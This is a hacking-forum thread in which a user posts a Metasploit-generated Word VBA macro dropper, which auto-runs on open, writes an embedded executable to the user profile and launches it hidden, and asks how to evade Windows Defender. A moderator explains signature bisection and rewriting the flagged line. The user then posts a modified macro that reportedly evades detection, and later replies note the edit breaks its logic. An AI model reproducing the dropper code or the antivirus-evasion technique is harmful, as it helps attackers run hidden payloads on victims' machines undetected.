Author Topic: Metasploit unleashed vbs infection tutorial vs Windows defender  (Read 1785 times)

0 Members and 1 Guest are viewing this topic.

Offline Avengers

  • Serf
  • *
  • Posts: 21
  • Cookies: -1
  • S.H.I.E.L.D
    • View Profile
So I'm trying to follow the metasploit unleashed tutorial here: https://www.offensive-security.com/metasploit-unleashed/vbscript-infection-methods/ about vbscript infection. I copied the payload into a word document, but when I try to save the macro, windows defender detects it immediately and it's game over. Long story short, for some reason windows defender doesn't detect me as admin so I can't turn it off. But even if it did, I need this macro to get past windows defender. How could this code be changed so that defender might not detect it so easily?
Code: [Select]
Sub moo()'' moo Macro''Sub Auto_Open()    Quvyt12End Sub
Sub Quvyt12()    Dim Quvyt7 As Integer    Dim Quvyt1 As String    Dim Quvyt2 As String    Dim Quvyt3 As Integer    Dim Quvyt4 As Paragraph    Dim Quvyt8 As Integer    Dim Quvyt9 As Boolean    Dim Quvyt5 As Integer    Dim Quvyt11 As String    Dim Quvyt6 As Byte    Dim Zdeovterfr As String    Zdeovterfr = "Zdeovterfr"    Quvyt1 = "AAKTrgfLVgU.exe"    Quvyt2 = Environ("USERPROFILE")    ChDrive (Quvyt2)    ChDir (Quvyt2)    Quvyt3 = FreeFile()    Open Quvyt1 For Binary As Quvyt3    For Each Quvyt4 In ActiveDocument.Paragraphs        DoEvents            Quvyt11 = Quvyt4.Range.Text        If (Quvyt9 = True) Then            Quvyt8 = 1            While (Quvyt8 < Len(Quvyt11))                Quvyt6 = Mid(Quvyt11, Quvyt8, 4)                Put #Quvyt3, , Quvyt6                Quvyt8 = Quvyt8 + 4            Wend        ElseIf (InStr(1, Quvyt11, Zdeovterfr) > 0 And Len(Quvyt11) > 0) Then            Quvyt9 = True        End If    Next    Close #Quvyt3    Quvyt13 (Quvyt1)End Sub
Sub Quvyt13(Quvyt10 As String)    Dim Quvyt7 As Integer    Dim Quvyt2 As String    Quvyt2 = Environ("USERPROFILE")    ChDrive (Quvyt2)    ChDir (Quvyt2)    Quvyt7 = Shell(Quvyt10, vbHide)End Sub
Sub AutoOpen()    Auto_OpenEnd Sub
Sub Workbook_Open()    Auto_OpenEnd Sub
End Sub


Sorry for this god-awful formatting. I'm stumped on that too.
« Last Edit: August 22, 2015, 08:14:13 pm by proxx »

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: Metasploit unleashed vbs infection tutorial vs Windows defender
« Reply #1 on: August 22, 2015, 11:47:47 am »
So I'm trying to follow the metasploit unleashed tutorial here: https://www.offensive-security.com/metasploit-unleashed/vbscript-infection-methods/ about vbscript infection. I copied the payload into a word document, but when I try to save the macro, windows defender detects it immediately and it's game over. Long story short, for some reason windows defender doesn't detect me as admin so I can't turn it off. But even if it did, I need this macro to get past windows defender. How could this code be changed so that defender might not detect it so easily?

Code: [Select]
Sub moo()'' moo Macro''Sub Auto_Open()    Quvyt12End Sub
Sub Quvyt12()    Dim Quvyt7 As Integer    Dim Quvyt1 As String    Dim Quvyt2 As String    Dim Quvyt3 As Integer    Dim Quvyt4 As Paragraph    Dim Quvyt8 As Integer    Dim Quvyt9 As Boolean    Dim Quvyt5 As Integer    Dim Quvyt11 As String    Dim Quvyt6 As Byte    Dim Zdeovterfr As String    Zdeovterfr = "Zdeovterfr"    Quvyt1 = "AAKTrgfLVgU.exe"    Quvyt2 = Environ("USERPROFILE")    ChDrive (Quvyt2)    ChDir (Quvyt2)    Quvyt3 = FreeFile()    Open Quvyt1 For Binary As Quvyt3    For Each Quvyt4 In ActiveDocument.Paragraphs        DoEvents            Quvyt11 = Quvyt4.Range.Text        If (Quvyt9 = True) Then            Quvyt8 = 1            While (Quvyt8 < Len(Quvyt11))                Quvyt6 = Mid(Quvyt11, Quvyt8, 4)                Put #Quvyt3, , Quvyt6                Quvyt8 = Quvyt8 + 4            Wend        ElseIf (InStr(1, Quvyt11, Zdeovterfr) > 0 And Len(Quvyt11) > 0) Then            Quvyt9 = True        End If    Next    Close #Quvyt3    Quvyt13 (Quvyt1)End Sub
Sub Quvyt13(Quvyt10 As String)    Dim Quvyt7 As Integer    Dim Quvyt2 As String    Quvyt2 = Environ("USERPROFILE")    ChDrive (Quvyt2)    ChDir (Quvyt2)    Quvyt7 = Shell(Quvyt10, vbHide)End Sub
Sub AutoOpen()    Auto_OpenEnd Sub
Sub Workbook_Open()    Auto_OpenEnd Sub

End Sub

Sorry for this god-awful formatting. I'm stumped on that too.

You can test which part windows defender starts bitching about,  a very stupid way to do this is to cut the code in half and test both parts, keep doing the latter until you found the part that is detected and try reformatting it.
There are members that know more about AV detection than I do but in case it detects behaviour instead of fingerprints this won't work.
« Last Edit: August 22, 2015, 08:14:38 pm by proxx »
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline Avengers

  • Serf
  • *
  • Posts: 21
  • Cookies: -1
  • S.H.I.E.L.D
    • View Profile
Re: Metasploit unleashed vbs infection tutorial vs Windows defender
« Reply #2 on: August 22, 2015, 04:01:15 pm »
You can test which part windows defender starts bitching about,  a very stupid way to do this is to cut the code in half and test both parts, keep doing the latter until you found the part that is detected and try reformatting it.
There are members that know more about AV detection than I do but in case it detects behaviour instead of fingerprints this won't work.
Ok I tested it and I was able to narrow it down to this part:
 ElseIf (InStr(1, Quvyt11, Zdeovterfr) > 0 And Len(Quvyt11) > 0) Then            Quvyt9 = True        End If

if I take that part out, Windows Defender doesn't bat an eye, but if it's in there it's fricking Armageddon... I honestly don't know where to begin with Visual Basic in terms of programming. It looks semi self explanatory and I might try messing around with it but does anyone have any reformatting suggestions?

EDIT: Somehow I got it past Windows defender by making a new integer variable set as the value of the length of Quvyt11, however now opening the file gives the error "Invalid procedure call or argument" and the debugger points to this line:

Quvyt7 = Shell(Quvyt10, vbHide)

I think it may have something to do with Quvyt10="AAKTrgfLVgU.exe". The only way I know that though is when visual basic tells me that when I hover over the variable with my cursor. Nowhere in the code is Quvty10 used again except for  "Sub Quvyt13(Quvyt10 As String)" which makes me wonder if Quvyt10 has even been correctly defined. Quvyt1 actually has been defined as this but not Quvyt10... I think something is getting confused there.
« Last Edit: August 22, 2015, 04:24:52 pm by Avengers »

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: Metasploit unleashed vbs infection tutorial vs Windows defender
« Reply #3 on: August 22, 2015, 08:10:42 pm »
Ok I tested it and I was able to narrow it down to this part:
 ElseIf (InStr(1, Quvyt11, Zdeovterfr) > 0 And Len(Quvyt11) > 0) Then            Quvyt9 = True        End If

if I take that part out, Windows Defender doesn't bat an eye, but if it's in there it's fricking Armageddon... I honestly don't know where to begin with Visual Basic in terms of programming. It looks semi self explanatory and I might try messing around with it but does anyone have any reformatting suggestions?

EDIT: Somehow I got it past Windows defender by making a new integer variable set as the value of the length of Quvyt11, however now opening the file gives the error "Invalid procedure call or argument" and the debugger points to this line:

Quvyt7 = Shell(Quvyt10, vbHide)

I think it may have something to do with Quvyt10="AAKTrgfLVgU.exe". The only way I know that though is when visual basic tells me that when I hover over the variable with my cursor. Nowhere in the code is Quvty10 used again except for  "Sub Quvyt13(Quvyt10 As String)" which makes me wonder if Quvyt10 has even been correctly defined. Quvyt1 actually has been defined as this but not Quvyt10... I think something is getting confused there.
You should change all occurances of the variable/object name you edited.
Also I very much disagree with the fact that you fail to read/understand the code, I suggest you work on this first, try to understand it first.
Replace the jitter with logical names and reproduce the code, it'll help you in trying to understand what is going on and you can debug it, this also goes for the obfusticated code you showed, have a template of sorts.
All the jitter names should be replaced by a system one can grasp , ofcourse keep readable instructions, add some formatting to it.
MS might have the unmodified code.

« Last Edit: August 22, 2015, 08:20:53 pm by proxx »
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline Deque

  • P.I.N.N.
  • Global Moderator
  • Overlord
  • *
  • Posts: 1203
  • Cookies: 518
  • Programmer, Malware Analyst
    • View Profile
Re: Metasploit unleashed vbs infection tutorial vs Windows defender
« Reply #4 on: August 22, 2015, 09:34:42 pm »
Actually I would have suggested to deal with the Windows Defender problem, but by now I think you benefit more by trying to understand that code first.
How much do you know about programming, though?
Quote
does anyone have any reformatting suggestions?
[...]
I think it may have something to do with Quvyt10="AAKTrgfLVgU.exe". The only way I know that though is when visual basic tells me that when I hover over the variable with my cursor. Nowhere in the code is Quvty10 used again except for  "Sub Quvyt13(Quvyt10 As String)" which makes me wonder if Quvyt10 has even been correctly defined. Quvyt1 actually has been defined as this but not Quvyt10... I think something is getting confused there.

The formatting is the first thing you should do. That you feel the need to get suggestions for formatting tells me that you don't understand the basic structure of this code.
So far you have problems with seeing where subprocedures start and end, otherwise you would not stumble over the definition of Quvyt10.

You also confuse the terms definition and initialization. Please get these terms straight or it will be very hard to communicate.
Where you say "Quvyt1 actually has been defined as this" you meant initialized with the value "AAKTrgfLVgU.exe".

Look up the basic structures of VB first: initialization, definition, procedures, procedure calls, if-else statements and loops. Do that so that you are able to identify them if you see them. A beginners tutorials should be enough.
Then you create the formatting yourself, based on what you know how these structures look like, because good formatting is nothing more than visually separating statements and structures from each other.

After you have done that, you can see if your understanding of the code got any better and try to modify it again.
Or post here if there are still questions.

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: Metasploit unleashed vbs infection tutorial vs Windows defender
« Reply #5 on: August 23, 2015, 01:31:32 am »
Also my bad, I used a term with 2 different meanings.
Reformatting, as in yes the layout.
Also rewriting code to prevent detection.

Sorry if that caused confusion.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline Avengers

  • Serf
  • *
  • Posts: 21
  • Cookies: -1
  • S.H.I.E.L.D
    • View Profile
Re: Metasploit unleashed vbs infection tutorial vs Windows defender
« Reply #6 on: August 23, 2015, 02:29:43 am »
Actually I would have suggested to deal with the Windows Defender problem, but by now I think you benefit more by trying to understand that code first.
How much do you know about programming, though?
The formatting is the first thing you should do. That you feel the need to get suggestions for formatting tells me that you don't understand the basic structure of this code.
So far you have problems with seeing where subprocedures start and end, otherwise you would not stumble over the definition of Quvyt10.

You also confuse the terms definition and initialization. Please get these terms straight or it will be very hard to communicate.
Where you say "Quvyt1 actually has been defined as this" you meant initialized with the value "AAKTrgfLVgU.exe".

Look up the basic structures of VB first: initialization, definition, procedures, procedure calls, if-else statements and loops. Do that so that you are able to identify them if you see them. A beginners tutorials should be enough.
Then you create the formatting yourself, based on what you know how these structures look like, because good formatting is nothing more than visually separating statements and structures from each other.

After you have done that, you can see if your understanding of the code got any better and try to modify it again.
Or post here if there are still questions.
I've spent some time looking into it, and I get the jist of what the code is doing now. I don't need to reformat anything because by initializing the length variable and calling it as a replacement for Len(Quvyt10) has managed to keep Windows Defender off of it for some reason. Now I simply need to know what the error is about. I looked up microsofts help file related to the error and it talked about the whole invalid argument thing, making me think this gibberish.exe file that's being called isn't anywhere to be found. What I don't understand is where this exe file would be, or if this code is supposed to create it or if it's supposed to have been read from the payload code in the document itself.

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: Metasploit unleashed vbs infection tutorial vs Windows defender
« Reply #7 on: August 23, 2015, 10:18:19 am »
I've spent some time looking into it, and I get the jist of what the code is doing now. I don't need to reformat anything because by initializing the length variable and calling it as a replacement for Len(Quvyt10) has managed to keep Windows Defender off of it for some reason. Now I simply need to know what the error is about. I looked up microsofts help file related to the error and it talked about the whole invalid argument thing, making me think this gibberish.exe file that's being called isn't anywhere to be found. What I don't understand is where this exe file would be, or if this code is supposed to create it or if it's supposed to have been read from the payload code in the document itself.
Not just for some reason, the reason I suggested changing the detected part is that windows defender is likely just to look at predifened footprints, if it does not match it is not flagged ;)

Nice that it worked, could you show us the new version?
« Last Edit: August 23, 2015, 10:20:40 am by proxx »
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline Avengers

  • Serf
  • *
  • Posts: 21
  • Cookies: -1
  • S.H.I.E.L.D
    • View Profile
Re: Metasploit unleashed vbs infection tutorial vs Windows defender
« Reply #8 on: August 23, 2015, 06:00:03 pm »
Yeah, I figured. It just seemed odd to me that such a small change would throw it off but hey if it works... Here's the new code:
Sub boo()'' boo Macro''Sub Auto_Open()    Quvyt12End Sub
Sub Quvyt12()    Dim Quvyt7 As Integer    Dim Quvyt1 As String    Dim Quvyt2 As String    Dim Quvyt3 As Integer    Dim Quvyt4 As Paragraph    Dim Quvyt8 As Integer    Dim Quvyt9 As Boolean    Dim Quvyt5 As Integer    Dim Quvyt11 As String    Dim Quvyt6 As Byte    Dim Zdeovterfr As String    Dim trigger As Boolean    Dim length As Integer    length = Len(Quvyt11)        Zdeovterfr = "Zdeovterfr"    Quvyt1 = "AAKTrgfLVgU.exe"    Quvyt2 = Environ("USERPROFILE")    ChDrive (Quvyt2)    ChDir (Quvyt2)    Quvyt3 = FreeFile()    Open Quvyt1 For Binary As Quvyt3
    For Each Quvyt4 In ActiveDocument.Paragraphs        DoEvents            Quvyt11 = Quvyt4.Range.Text        If (Quvyt9 = True) Then            Quvyt8 = 1            While (Quvyt8 < Len(Quvyt11))                Quvyt6 = Mid(Quvyt11, Quvyt8, 4)                Put #Quvyt3, , Quvyt6                Quvyt8 = Quvyt8 + 4            Wend'here's the issue        ElseIf (InStr(1, Quvyt11, Zdeovterfr) > 0 And length > 0) Then            Quvyt9 = True        End If'End issue    Next    Close #Quvyt3    Quvyt13 (Quvyt1)
End Sub
Sub Quvyt13(Quvyt10 As String)    Dim Quvyt7 As Integer    Dim Quvyt2 As String    Quvyt2 = Environ("USERPROFILE")    ChDrive (Quvyt2)    ChDir (Quvyt2)    Quvyt7 = Shell("AAKTrgfLVgU.exe", vbHide)End Sub
Sub AutoOpen()    Auto_OpenEnd Sub
Sub Workbook_Open()    Auto_OpenEnd Sub

End Sub
PS I know the trigger variable is initialized but not used, I was going to try something else but I didn't need to :D

Offline Deque

  • P.I.N.N.
  • Global Moderator
  • Overlord
  • *
  • Posts: 1203
  • Cookies: 518
  • Programmer, Malware Analyst
    • View Profile
Re: Metasploit unleashed vbs infection tutorial vs Windows defender
« Reply #9 on: August 23, 2015, 07:15:27 pm »
Yeah, I figured. It just seemed odd to me that such a small change would throw it off but hey if it works... Here's the new code:
Sub boo()'' boo Macro''Sub Auto_Open()    Quvyt12End Sub
Sub Quvyt12()    Dim Quvyt7 As Integer    Dim Quvyt1 As String    Dim Quvyt2 As String    Dim Quvyt3 As Integer    Dim Quvyt4 As Paragraph    Dim Quvyt8 As Integer    Dim Quvyt9 As Boolean    Dim Quvyt5 As Integer    Dim Quvyt11 As String    Dim Quvyt6 As Byte    Dim Zdeovterfr As String    Dim trigger As Boolean    Dim length As Integer    length = Len(Quvyt11)        Zdeovterfr = "Zdeovterfr"    Quvyt1 = "AAKTrgfLVgU.exe"    Quvyt2 = Environ("USERPROFILE")    ChDrive (Quvyt2)    ChDir (Quvyt2)    Quvyt3 = FreeFile()    Open Quvyt1 For Binary As Quvyt3
    For Each Quvyt4 In ActiveDocument.Paragraphs        DoEvents            Quvyt11 = Quvyt4.Range.Text        If (Quvyt9 = True) Then            Quvyt8 = 1            While (Quvyt8 < Len(Quvyt11))                Quvyt6 = Mid(Quvyt11, Quvyt8, 4)                Put #Quvyt3, , Quvyt6                Quvyt8 = Quvyt8 + 4            Wend'here's the issue        ElseIf (InStr(1, Quvyt11, Zdeovterfr) > 0 And length > 0) Then            Quvyt9 = True        End If'End issue    Next    Close #Quvyt3    Quvyt13 (Quvyt1)
End Sub
Sub Quvyt13(Quvyt10 As String)    Dim Quvyt7 As Integer    Dim Quvyt2 As String    Quvyt2 = Environ("USERPROFILE")    ChDrive (Quvyt2)    ChDir (Quvyt2)    Quvyt7 = Shell("AAKTrgfLVgU.exe", vbHide)End Sub
Sub AutoOpen()    Auto_OpenEnd Sub
Sub Workbook_Open()    Auto_OpenEnd Sub

End Sub
PS I know the trigger variable is initialized but not used, I was going to try something else but I didn't need to :D

You obviously did not understand the code. Your change to the code is not equivalent and must cause problems.
Quvyt11 is set to new value with every iteration in the outer loop. You just take the length before the loop even starts and the value is not correctly updated.

You would have seen that immediately if you formatted the code properly. Please do that instead of being lazy on such a simple thing.

Quote
I don't need to reformat anything
[...]
What I don't understand is where this exe file would be, or if this code is supposed to create it or if it's supposed to have been read from the payload code in the document itself.

You could have formatted this code in only two minutes and save you a headache for the rest of the time you try to understand the code. There are even automatic code indenter for VB Script out there.
Please do that and least try to understand the code. Look up the meaning of some functions that seem important. This is a short piece of code, it is not complicated.
« Last Edit: August 23, 2015, 07:20:02 pm by Deque »